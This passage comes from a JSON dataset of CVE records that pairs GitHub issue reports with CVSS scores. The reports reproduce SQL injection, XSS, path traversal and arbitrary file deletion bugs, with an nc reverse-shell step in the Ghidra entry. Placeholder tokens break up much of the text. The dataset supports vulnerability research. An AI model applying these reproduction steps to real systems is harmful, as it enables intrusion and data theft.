\u653b\u51fb\u5c55\u793a\u5982\u4e0b\uff1a FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5728\u8bbe\u7f6e\u8def\u7531\u5904\u672a\u4f7f\u7528token\u6821\u9a8c\uff0c APITAG FILETAG FILETAG FILETAG FILETAG",
  39035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39036. "severity": "MEDIUM",
  39037. "baseScore": 6.5,
  39038. "impactScore": 3.6,
  39039. "exploitabilityScore": 2.8
  39040. },
  39041. {
  39042. "CVE_ID": "CVE-2019-16679",
  39043. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/33",
  39044. "Issue_Url_new": "https://github.com/gilacms/gila/issues/33",
  39045. "Repo_new": "gilacms/gila",
  39046. "Issue_Created_At": "2019-08-04T06:34:40Z",
  39047. "description": "Authenticated Local File Inclusion(LFI) in fm module. Hello Team, When I'm using the application, I observed that application is vulnerable to APITAG File Inclusion) vulnerability. an only authenticated user can perform this exploit remotely. Step to reproduce the Vulnerability Login into the application as an admin user or equivalent user and go the below link APITAG FILETAG To fix the Vulnerability If possible, do not permit appending file paths directly. Make them hard coded or selectable from a limited hard coded path list via an index variable. If you definitely need dynamic path concatenation, ensure you only accept required characters such as \"a Z NUMBERTAG and do not allow \"..\" or \"/\" or NUMBERTAG null byte) or any other similar unexpected characters. It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack. Tested on Windows NUMBERTAG AMPP version NUMBERTAG Gila CMS Version NUMBERTAG",
  39048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  39049. "severity": "MEDIUM",
  39050. "baseScore": 4.9,
  39051. "impactScore": 3.6,
  39052. "exploitabilityScore": 1.2
  39053. },
  39054. {
  39055. "CVE_ID": "CVE-2019-16692",
  39056. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2738",
  39057. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2738",
  39058. "Repo_new": "phpipam/phpipam",
  39059. "Issue_Created_At": "2019-09-16T09:18:53Z",
  39060. "description": "Five sql injections on All Phpipam Versions.. Describe the bug Five sql injections on All phpipam APITAG vulnerable files are PATHTAG APITAG version All phpipam Versions. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure We can find APITAG APITAG info in response content. rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG APITAG compressed insecure rsp: The time of response is more than NUMBERTAG s. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG APITAG Filter saved APITAG % vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG &current NUMBERTAG next NUMBERTAG compressed insecure",
  39061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39062. "severity": "CRITICAL",
  39063. "baseScore": 9.8,
  39064. "impactScore": 5.9,
  39065. "exploitabilityScore": 3.9
  39066. },
  39067. {
  39068. "CVE_ID": "CVE-2019-16703",
  39069. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/7",
  39070. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/7",
  39071. "Repo_new": "gaozhifeng/phpmywind",
  39072. "Issue_Created_At": "2019-09-04T06:06:50Z",
  39073. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG No security check in page PATHTAG FILETAG When I add a new article, I use \" APITAG alert(/xss/) APITAG \" as the title FILETAG then back to the PATHTAG FILETAG background page executed a javascript script Fix: Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on. Verify the data type and verify its format, length, scope, and content. Not only need to be verified on the client side but also on the server side. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.",
  39074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39075. "severity": "MEDIUM",
  39076. "baseScore": 6.1,
  39077. "impactScore": 2.7,
  39078. "exploitabilityScore": 2.8
  39079. },
  39080. {
  39081. "CVE_ID": "CVE-2019-16704",
  39082. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/1",
  39083. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/1",
  39084. "Repo_new": "lolipop1234/xxd",
  39085. "Issue_Created_At": "2019-09-05T09:16:35Z",
  39086. "description": "PHPMYWIND CMS XSS. After logging in to the management page using the ADMIN account, you can insert the JAVASCRIPT code in multiple editable places and affect the home page display. Take PATHTAG as an example Step NUMBERTAG open page PATHTAG login use admin accont FILETAG Step NUMBERTAG open page PATHTAG FILETAG Step NUMBERTAG Enter APITAG at the title and save FILETAG Step NUMBERTAG refresh FILETAG Javascript code is executed FILETAG Other vulnerable page steps are consistent with the above ,then not described one by one. The background of the website application is not protected.",
  39087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  39088. "severity": "MEDIUM",
  39089. "baseScore": 4.8,
  39090. "impactScore": 2.7,
  39091. "exploitabilityScore": 1.7
  39092. },
  39093. {
  39094. "CVE_ID": "CVE-2019-16705",
  39095. "Issue_Url_old": "https://github.com/libming/libming/issues/178",
  39096. "Issue_Url_new": "https://github.com/libming/libming/issues/178",
  39097. "Repo_new": "libming/libming",
  39098. "Issue_Created_At": "2019-02-28T08:05:46Z",
  39099. "description": "Heap Buffer Overflow (OOB Read) in function APITAG decompile.c NUMBERTAG Description An out of bound read was found in function APITAG (file util/decompile.c NUMBERTAG Details: ERRORTAG poc file URLTAG Credit APITAG of Venustech",
  39100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  39101. "severity": "CRITICAL",
  39102. "baseScore": 9.1,
  39103. "impactScore": 5.2,
  39104. "exploitabilityScore": 3.9
  39105. },
  39106. {
  39107. "CVE_ID": "CVE-2019-16706",
  39108. "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/1",
  39109. "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/1",
  39110. "Repo_new": "wangyifani/kkcms",
  39111. "Issue_Created_At": "2019-10-17T01:47:34Z",
  39112. "description": "search.php exist XSS. XSS exists in homepage search function FILETAG input payload \"> APITAG FILETAG FILETAG",
  39113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  39114. "severity": "HIGH",
  39115. "baseScore": 8.8,
  39116. "impactScore": 5.9,
  39117. "exploitabilityScore": 2.8
  39118. },
  39119. {
  39120. "CVE_ID": "CVE-2019-16708",
  39121. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1531",
  39122. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1531",
  39123. "Repo_new": "imagemagick/imagemagick",
  39124. "Issue_Created_At": "2019-03-27T08:51:13Z",
  39125. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce APITAG then close the windows of APITAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  39126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39127. "severity": "MEDIUM",
  39128. "baseScore": 6.5,
  39129. "impactScore": 3.6,
  39130. "exploitabilityScore": 2.8
  39131. },
  39132. {
  39133. "CVE_ID": "CVE-2019-16710",
  39134. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1528",
  39135. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1528",
  39136. "Repo_new": "imagemagick/imagemagick",
  39137. "Issue_Created_At": "2019-03-25T09:50:16Z",
  39138. "description": "memory leaks. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description memory leaks in APITAG ERRORTAG Steps to Reproduce ./magick composite input1 input2 output.aai System Configuration APITAG ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG NUMBERTAG configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" APITAG version NUMBERTAG APITAG",
  39139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39140. "severity": "MEDIUM",
  39141. "baseScore": 6.5,
  39142. "impactScore": 3.6,
  39143. "exploitabilityScore": 2.8
  39144. },
  39145. {
  39146. "CVE_ID": "CVE-2019-16711",
  39147. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1542",
  39148. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1542",
  39149. "Repo_new": "imagemagick/imagemagick",
  39150. "Issue_Created_At": "2019-04-11T02:03:07Z",
  39151. "description": "memory leak in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce PATHTAG composite Memory Leak input1 Memory Leak input2 output.ps2 System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: ' ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared' APITAG testcase: FILETAG reporter: APITAG of Venustech",
  39152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39153. "severity": "MEDIUM",
  39154. "baseScore": 6.5,
  39155. "impactScore": 3.6,
  39156. "exploitabilityScore": 2.8
  39157. },
  39158. {
  39159. "CVE_ID": "CVE-2019-16712",
  39160. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1557",
  39161. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1557",
  39162. "Repo_new": "imagemagick/imagemagick",
  39163. "Issue_Created_At": "2019-04-28T04:35:49Z",
  39164. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG NUMBERTAG ERROR: APITAG detected memory leaks CODETAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared teatcase:[ FILETAG credit by APITAG of Venustech APITAG",
  39165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39166. "severity": "MEDIUM",
  39167. "baseScore": 6.5,
  39168. "impactScore": 3.6,
  39169. "exploitabilityScore": 2.8
  39170. },
  39171. {
  39172. "CVE_ID": "CVE-2019-16713",
  39173. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1558",
  39174. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1558",
  39175. "Repo_new": "imagemagick/imagemagick",
  39176. "Issue_Created_At": "2019-04-28T04:48:48Z",
  39177. "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared testcase: FILETAG report by APITAG of Venustech APITAG",
  39178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  39179. "severity": "MEDIUM",
  39180. "baseScore": 6.5,
  39181. "impactScore": 3.6,
  39182. "exploitabilityScore": 2.8
  39183. },
  39184. {
  39185. "CVE_ID": "CVE-2019-16723",
  39186. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2964",
  39187. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2964",
  39188. "Repo_new": "cacti/cacti",
  39189. "Issue_Created_At": "2019-09-22T16:37:05Z",
  39190. "description": "Serious security issue allows to view all graphs. I have created a user with no group membership. Graph permission default is DENY and I have selected all graphs Restricted instead of NUMBERTAG I have device params default DENY and only set to specific one. Template perm is set to DENY. Tree Perms is also default DENY and I set to access only a specific one. When I login with that user I see only one option in tree and when I click on the device I see the graph. Everything is fine. But if I take the url APITAG and change the local_graph_id with another value ie NUMBERTAG I get a response and inside that response I see the image which is base NUMBERTAG If I decode and create png I can see the other graph that I dont have permission to see. I tried to update to latest cacti NUMBERTAG and it still get that security issue. I also checked the source code carefully and I don't see any permission check regarding graphs. For example I see permission check for tree node creation but not for graphs.",
  39191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  39192. "severity": "MEDIUM",
  39193. "baseScore": 4.3,
  39194. "impactScore": 1.4,
  39195. "exploitabilityScore": 2.8
  39196. },
  39197. {
  39198. "CVE_ID": "CVE-2019-16747",
  39199. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/33",
  39200. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/33",
  39201. "Repo_new": "matrixssl/matrixssl",
  39202. "Issue_Created_At": "2019-07-25T10:42:31Z",
  39203. "description": "Memory corruption (free on invalid pointer) while parsing DTLS messages. APITAG DTLS server (in versions NUMBERTAG Open and NUMBERTAG Open) incorrectly handles incoming network messages leading to memory corruption issue, resulting in crash of the server. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Sent NUMBERTAG bytes Select woke NUMBERTAG Got REQUEST_RECV from APITAG Select woke NUMBERTAG Error in PATHTAG APITAG invalid pointer NUMBERTAG ae NUMBERTAG Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
  39204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39205. "severity": "HIGH",
  39206. "baseScore": 7.5,
  39207. "impactScore": 3.6,
  39208. "exploitabilityScore": 3.9
  39209. },
  39210. {
  39211. "CVE_ID": "CVE-2019-16748",
  39212. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2459",
  39213. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2459",
  39214. "Repo_new": "wolfssl/wolfssl",
  39215. "Issue_Created_At": "2019-09-10T10:29:02Z",
  39216. "description": "Heap overread bug in checking cert signature. Hi, another heap overread bug which could be triggerd remotely tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang /gcc / asan / generate Makefile with ./configure enable lowresource Missing sanity checks before APITAG PATHTAG CODETAG You could trigger it through following steps NUMBERTAG start wolfss example server program under directory \"examples/server\" by invoking: ./server b p NUMBERTAG start py script client_raw.py which sends crafted messages to local port NUMBERTAG FILETAG ASAN report ( if examples/server is compiled with asan ): ERRORTAG",
  39217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39218. "severity": "CRITICAL",
  39219. "baseScore": 9.8,
  39220. "impactScore": 5.9,
  39221. "exploitabilityScore": 3.9
  39222. },
  39223. {
  39224. "CVE_ID": "CVE-2019-16751",
  39225. "Issue_Url_old": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
  39226. "Issue_Url_new": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
  39227. "Repo_new": "lynndylanhurley/devise_token_auth",
  39228. "Issue_Created_At": "2019-08-22T15:52:55Z",
  39229. "description": "XSS and Open Redirect. Version : APITAG Routes : APITAG Description : The omniauth failure endpoint is vulnerable to Reflected XSS through the message parameter. Unauthenticated attackers can craft a URL that executes a malicious APITAG payload in the victim\u2019s browser. The same endpoint is also vulnerable to an Open Redirect through the auth_origin_url parameter. Unauthenticated attackers can craft a URL that sends users to a malicious site to phish credentials or launch additional attacks. URLs to reproduce : The following URL should trigger a JS alert with the XSS message. APITAG The following URL should redirect to google. APITAG Reason : The APITAG method and APITAG methods in APITAG are using untrusted input to build the redirect and render the error message. Remediation : Redirect to a pre configured auth_origin_url value and do not trust user input. Use templates that sanitize/escape HTML in rendered params by default or utilize FILETAG to sanitize the message parameter in place.",
  39230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39231. "severity": "MEDIUM",
  39232. "baseScore": 6.1,
  39233. "impactScore": 2.7,
  39234. "exploitabilityScore": 2.8
  39235. },
  39236. {
  39237. "CVE_ID": "CVE-2019-16867",
  39238. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/12",
  39239. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/12",
  39240. "Repo_new": "neeke/hongcms",
  39241. "Issue_Created_At": "2019-09-23T09:19:45Z",
  39242. "description": "APITAG NUMBERTAG Arbitrary file deletion and reinstall APITAG U need log into manage page and request this page:\u201c URLTAG \u201d. and POST file parameter file= APITAG if u delete FILETAG and view FILETAG , u will reinstall this cms! like this: CODETAG let's view source code: local PATHTAG line NUMBERTAG to line NUMBERTAG ar $action from $_GET[\"action\"] var $filename from $_POST[\"file\"]",
  39243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  39244. "severity": "MEDIUM",
  39245. "baseScore": 6.5,
  39246. "impactScore": 3.6,
  39247. "exploitabilityScore": 2.8
  39248. },
  39249. {
  39250. "CVE_ID": "CVE-2019-16868",
  39251. "Issue_Url_old": "https://github.com/emlog/emlog/issues/48",
  39252. "Issue_Url_new": "https://github.com/emlog/emlog/issues/48",
  39253. "Repo_new": "emlog/emlog",
  39254. "Issue_Created_At": "2019-09-25T05:43:34Z",
  39255. "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG post any filepath as \"bak\" , will delete it. Login management background and view APITAG POST bak=anyfile,like FILETAG something. POC: CODETAG",
  39256. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39257. "severity": "CRITICAL",
  39258. "baseScore": 9.8,
  39259. "impactScore": 5.9,
  39260. "exploitabilityScore": 3.9
  39261. },
  39262. {
  39263. "CVE_ID": "CVE-2019-16869",
  39264. "Issue_Url_old": "https://github.com/netty/netty/issues/9571",
  39265. "Issue_Url_new": "https://github.com/netty/netty/issues/9571",
  39266. "Repo_new": "netty/netty",
  39267. "Issue_Created_At": "2019-09-16T17:55:33Z",
  39268. "description": "http request smuggling, cause by obfuscating TE header. Expected behavior ignore obfuscating TE APITAG Encoding : chunked\" vs APITAG Encoding: chunked\") Actual behavior use Transfer Encoding[space] as Transfer Encoding Steps to reproduce NUMBERTAG topology: APITAG NUMBERTAG client send a request with both content length and trunked encoded[space NUMBERTAG elb ignored trunked encoded[space], but use content length NUMBERTAG netty use trunked encoded[space] Minimal yet complete reproducer code (or URL to code) when header field end with space but not colon, shoud the space be ignored? can not found proof in URLTAG code in APITAG APITAG APITAG for APITAG = APITAG APITAG APITAG APITAG APITAG ) { break; } } APITAG Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
  39269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39270. "severity": "HIGH",
  39271. "baseScore": 7.5,
  39272. "impactScore": 3.6,
  39273. "exploitabilityScore": 3.9
  39274. },
  39275. {
  39276. "CVE_ID": "CVE-2019-16884",
  39277. "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2128",
  39278. "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2128",
  39279. "Repo_new": "opencontainers/runc",
  39280. "Issue_Created_At": "2019-09-22T13:15:28Z",
  39281. "description": "APITAG can be bypassed by a malicious image that specifies a volume at /proc. A malicious volume can specify a volume mount on APITAG . Since Docker populates the volume by copying data present in the image, it's possible to build a fake structure that will trick into runc into believing it had successfully written to APITAG : URLTAG This is possible because APITAG is executed in the container rootfs, after pivot_root in APITAG URLTAG APITAG is supposed to prevent mounting on top of APITAG : URLTAG ... but the check does not work. I believe the reason is that the dest argument is resolved to an absolute path using APITAG (before pivot_root), unlike the blacklist in APITAG which is relative to the rootfs: URLTAG Minimal proof of concept (on Ubuntu NUMBERTAG ERRORTAG Not a critical bug on its own, but should get a CVE assigned. Discovered by Adam Iwaniuk and disclosed during APITAG CTF ( URLTAG The CTF challenge mounted a file to APITAG and denied access to it using an APITAG policy. The bug could then be used to disable the policy and read the file: URLTAG",
  39282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39283. "severity": "HIGH",
  39284. "baseScore": 7.5,
  39285. "impactScore": 3.6,
  39286. "exploitabilityScore": 3.9
  39287. },
  39288. {
  39289. "CVE_ID": "CVE-2019-16890",
  39290. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/311",
  39291. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/311",
  39292. "Repo_new": "halo-dev/halo",
  39293. "Issue_Created_At": "2019-09-25T08:14:17Z",
  39294. "description": "Storage XSS vulnerabilities in article reviews. Enter at the Write Comments Screenshots : FILETAG After the request is successful. View in the background. For the comment list, click jack NUMBERTAG APITAG XSS vulnerability will be launched. APITAG Hackers can steal APITAG APITAG of privileges is APITAG Token Payload CODETAG APITAG APITAG APITAG The reason for the vulnerability is an error in APITAG parameter filtering APITAG CODETAG Ask the author to fix this APITAG",
  39295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39296. "severity": "MEDIUM",
  39297. "baseScore": 5.4,
  39298. "impactScore": 2.7,
  39299. "exploitabilityScore": 2.3
  39300. },
  39301. {
  39302. "CVE_ID": "CVE-2019-16903",
  39303. "Issue_Url_old": "https://github.com/plutinosoft/Platinum/issues/22",
  39304. "Issue_Url_new": "https://github.com/plutinosoft/platinum/issues/22",
  39305. "Repo_new": "plutinosoft/platinum",
  39306. "Issue_Created_At": "2019-07-22T09:26:54Z",
  39307. "description": "APITAG have APITAG Vulnerability. I audit the code and found a problem\uff0cthe problem code is PATHTAG NUMBERTAG ERRORTAG the function to prevent pathtraversal is not enough\uff1a APITAG NUMBERTAG in the APITAG line NUMBERTAG the function APITAG CODETAG we know if victim's root directory is\uff1a PATHTAG if an attacker post a GET request as\uff1a FILETAG the variable \"file_path\" is \".. APITAG and the filter function APITAG could not match \"../\" so cause APITAG Vulnerability we suggest the code as fallows: if APITAG NUMBERTAG APITAG NUMBERTAG",
  39308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  39309. "severity": "MEDIUM",
  39310. "baseScore": 5.3,
  39311. "impactScore": 1.4,
  39312. "exploitabilityScore": 3.9
  39313. },
  39314. {
  39315. "CVE_ID": "CVE-2019-16904",
  39316. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2685",
  39317. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2685",
  39318. "Repo_new": "nilsteampassnet/teampass",
  39319. "Issue_Created_At": "2019-09-25T14:06:24Z",
  39320. "description": "Stored XSS in previous password field. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Edit the previous saved item, change the password to any you want NUMBERTAG Reload the page. That's all... we can tap to the item and XSS payload will be executed (because there isn't any filtration in previous used passwords field). Besides, XSS payload will be executed if you try to look at the change history. So we have two places where there isn't any filtration. An attacker can share the item to admin and get admin's cookie for example. FILETAG",
  39321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39322. "severity": "MEDIUM",
  39323. "baseScore": 5.4,
  39324. "impactScore": 2.7,
  39325. "exploitabilityScore": 2.3
  39326. },
  39327. {
  39328. "CVE_ID": "CVE-2019-16923",
  39329. "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/2",
  39330. "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/2",
  39331. "Repo_new": "wangyifani/kkcms",
  39332. "Issue_Created_At": "2019-09-27T08:23:53Z",
  39333. "description": "jx.php url parameter has xss vulnerability. Xss vulnerability payload\uff1aurl=\"> APITAG APITAG alert NUMBERTAG APITAG \" FILETAG",
  39334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39335. "severity": "MEDIUM",
  39336. "baseScore": 6.1,
  39337. "impactScore": 2.7,
  39338. "exploitabilityScore": 2.8
  39339. },
  39340. {
  39341. "CVE_ID": "CVE-2019-16941",
  39342. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/1090",
  39343. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/1090",
  39344. "Repo_new": "nationalsecurityagency/ghidra",
  39345. "Issue_Created_At": "2019-09-28T13:09:07Z",
  39346. "description": "RCE possible in Function Bit Patterns Explorer Plugin. Description: APITAG is used in APITAG which causes a allows Remote Code Execution in the Bit Patterns Explorer Plugin. Steps to reproduce the behavior NUMBERTAG Open a binary with APITAG NUMBERTAG Go to Window APITAG Manager and select the APITAG NUMBERTAG Export the resulted XML file NUMBERTAG Add the following at the end of the file, after the closing tag of the last object and before the APITAG closing tag: APITAG APITAG APITAG nc APITAG NUMBERTAG c PATHTAG APITAG APITAG APITAG NUMBERTAG Open local listening server with : \"nc lvnp NUMBERTAG Go to Window APITAG Bit Patterns Explorer (you will need to enable experimental mode from configuration first File APITAG NUMBERTAG In the opened plugin window, click APITAG XML Files\", point to the directory where the XML file was saved and click OK NUMBERTAG Go back to the listener and see the shell opened. Expected behavior No code should be executed while running this plugin. Environment: OS: Kali Linu NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG",
  39347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39348. "severity": "CRITICAL",
  39349. "baseScore": 9.8,
  39350. "impactScore": 5.9,
  39351. "exploitabilityScore": 3.9
  39352. },
  39353. {
  39354. "CVE_ID": "CVE-2019-16942",
  39355. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2478",
  39356. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2478",
  39357. "Repo_new": "fasterxml/jackson-databind",
  39358. "Issue_Created_At": "2019-09-27T15:44:21Z",
  39359. "description": "Block two new serialization gadgets . Hi, there. Recently, I found two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to EMAILTAG . Cheers!",
  39360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39361. "severity": "CRITICAL",
  39362. "baseScore": 9.8,
  39363. "impactScore": 5.9,
  39364. "exploitabilityScore": 3.9
  39365. },
  39366. {
  39367. "CVE_ID": "CVE-2019-16992",
  39368. "Issue_Url_old": "https://github.com/keybase/keybase-issues/issues/3583",
  39369. "Issue_Url_new": "https://github.com/keybase/keybase-issues/issues/3583",
  39370. "Repo_new": "keybase/keybase-issues",
  39371. "Issue_Created_At": "2019-09-29T21:01:23Z",
  39372. "description": "Keybase iOS has a backdoor that signs proofs against my knowledge and consent. URLTAG I don't want XLM shitcoins. I don't want anyone to send me XLM shitcoins thinking I want them. I don't hold any private keys for XLM shitcoins. Somehow, an attestation URLTAG has found its way onto my profile, signed by one of my devices by the Keybase iOS client. I did not want this signature generated with my keys. Indeed, it happened without my knowledge or consent. I am unable to revoke this from my keybase profile.",
  39373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39374. "severity": "HIGH",
  39375. "baseScore": 7.5,
  39376. "impactScore": 3.6,
  39377. "exploitabilityScore": 3.9
  39378. },
  39379. {
  39380. "CVE_ID": "CVE-2019-16996",
